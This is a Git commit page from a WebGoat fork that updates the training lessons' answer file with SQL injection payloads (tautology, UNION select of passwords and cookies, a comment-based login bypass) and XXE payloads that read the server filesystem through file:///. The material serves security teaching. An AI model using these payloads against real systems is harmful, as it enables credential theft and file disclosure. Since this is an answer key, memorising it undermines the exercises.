dubey/WebGoat
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

update for XXE solutions

Browse Source
This commit is contained in:
Jason White 2017-06-27 08:27:06 -04:00
parent 06a3f5d189
commit 3a9bb946ed
1 changed files with 4 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

5
webgoat-lessons/sol.txt
View File

@ -3,6 +3,9 @@ Basic
Smith - to show it returns smith's records
Smith' or '1'='1 - to show exploit; 1=1 can be any true clause
**Bender Login
bender@juice-sh.op' --
[2:19 PM]
101
101 or 1=1
@ -11,7 +14,7 @@ Smith' union select userid,user_name, password,cookie,cookie, cookie,userid from
## XXE ##
Simple - <?xml version="1.0" standalone="yes" ?><!DOCTYPE user [<!ENTITY root SYSTEM "file:///"> ]><user> <username>&root;</username><password>test</password></user>
Simple <?xml version="1.0" standalone="yes" ?><!DOCTYPE comment [<!ENTITY root SYSTEM "file:///"> ]><comment> <text>&root;</text><password>test</password></comment>
Modern Rest Framework - change content type to: Content-Type: application/xml &&
<?xml version="1.0" standalone="yes" ?><!DOCTYPE user [<!ENTITY root SYSTEM "file:///"> ]><user> <username>&root;</username><password>test</password></user>